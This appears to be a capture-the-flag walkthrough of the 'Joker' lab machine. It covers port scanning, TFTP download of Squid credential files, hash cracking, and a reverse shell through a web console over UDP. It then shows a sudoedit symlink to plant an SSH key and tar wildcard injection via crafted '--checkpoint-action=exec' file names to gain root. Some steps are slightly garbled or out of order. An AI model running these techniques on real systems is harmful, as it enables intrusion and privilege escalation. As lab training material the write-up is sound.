Joker
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.21 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,3128 10.10.10.146 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
We only see port 22 (SSH), and port 3128 (Squid), which is a web proxy cache. In order to use it, we'll have to make a new proxy configuration in the FoxyProxy extension.
If we access the HTTP server through the web proxy, it will ask for credentials.
As we don't have credentials, there is not much we can do with the web proxy. We need to find credentials. One thing that we have missed, is UDP ports. There is one particular service called TFTP which is exposed through the UDP 69 port. Nmap report the port as filtered|open.
nmap -p69 -sU 10.10.10.21 -oN udpScan
-p scan specific port.
-sU UDP scan.
-oN save the scan result into file, in this case the udpScan file.
If we connect to the TFTP server, and try to get the /etc/passwd file, we'll get an access violation error.
tftp 10.10.10.21
But, one file that might be interesting to get is the squid configuration file /etc/squid/squid.conf, which is allow to download.
tftp> get /etc/squid/squid.conf
Inside the configuration file, there is a line where the authentication is being configured, and it shows the /etc/squid/passwords file.
cat squid.conf | grep -v "#" | sed '/^$/d'
Let's download that file.
tftp> get /etc/squid/passwords
The file contains a password hash for the kalamari user.
cat passwords
Let's break the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
Now that we have credentials, let's modify the proxy on FoxyProxy, and add the username and password.
As every request goes through the web proxy, we can access resources that we weren't available to access previously. For example, we could try to access the HTTP server. To do it, access 127.0.0.1:80 from the browser.
Before exploring the site, let's enumerate subdirectories with gobuster. Make sure to run the command through the proxy with the credentials.
gobuster dir -u http://127.0.0.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php --proxy http://kalamari:ihateseafood@10.10.10.21:3128
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.
--proxy specifies proxy.
The /console directory shows a python interactive console where I can run code.
We could try to get a reverse shell with netcat. First, set a netcat listener on port 4444.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
Now, import the os library, and send a reverse shell to our machine.
But, the netcat listener doesn't receive any connection. This might be happening because of some firewall configuration. Let's see what is inside the /etc/iptables directory. To see the output of the command, use os.popen().read().
Let's get the content of the rules.v4 file, but encoded in base64.
If we decode the content, we'll see that the firewall is blocking any TCP connection, except input connection to ports 22, and 3128. But UDP is accepted by the firewall, so we could send the reverse shell through UDP.
echo 'IyBHZW...wMTcK' | base64 -d
Set another netcat listener listening on the UDP port 4444.
nc -lvnp 4444 -u
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
-u UDP mode.
Now send the reverse shell we sent before, but this time with the -u argument.
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we check the sudo privileges, we'll see that we can run as the alekos user the sudoedit command in the /var/www/*/*/layout.html file.
sudo -l
Let's create the correct path. Inside the /var/www/ directory there is another one called testing, which we are the owners, so we can create directories inside.
ls -l /var/www/
Let's create the pwned directory inside testing.
mkdir /var/www/testing/pwned
Now, create the layout.html file inside.
touch /var/www/testing/pwned/layout.html
Now, we can run the sudoedit command on that file as the alekos user. To get a shell, one thing we could do is make a symbolic link from layout.html to the authorized_keys file of alekos, and put inside our public SSH key so we are allowed to login as alekos to the system without the need of his password. First, create a symbolic link.
n -s -f /home/alekos/.ssh/authorized_keys layout.html
-s make a symbolic link.
-f force.
Now, on our local machine, create a pair of SSH keys.
ssh-keygen
Copy the public key.
cat id_rsa.pub | xclip -sel clip
Now, run the sudoedit command on the layout.html file as the alekos user, and paste you public key.
sudoedit -u alekos /var/www/testing/pwned/layout.html
Now we should be able to log in via SSH as alekos without using a password. Then, we'll be able to grab the user flag.
ssh alekos@10.10.10.21
Inside the home directory of the alekos user, there are two directories.
ls -l
The development directory has some files an folders of an application.
ls -l development/
And the backup directory has some backup files of the development directory. The backup files are made by the root user.
ls -l backup/
tar -czvf dev-1514134201.tar.gz /home/alekos/development/*
If this is the case, we can make the root user give the /bin/bash binary the SUID permission. First, make a file called privEsc on the development directory with the following content.
nano /home/alekos/development/privEsc
Now, we'll have to make a file called --checkpoint=1 inside development.
touch -- '/home/alekos/development/--checkpoint=1'
Create another file called --checkpoint-action=exec=bash privEsc.
touch -- '/home/alekos/development/--checkpoint-action=exec=bash privEsc'
Now, if we wait for the root user to compress the development directory, those two files will act as arguments of the tar command, and it will run the privEsc script.
ls -l /bin/bash
Now, all we have to do is run bash with SUID permissions, and reap the harvest and take the root flag.
bash -p
If the root user is make all this backup files with the tar tool, and is using a wildcard character *, there is a way to to root. I suppose that root might me running a command like this.
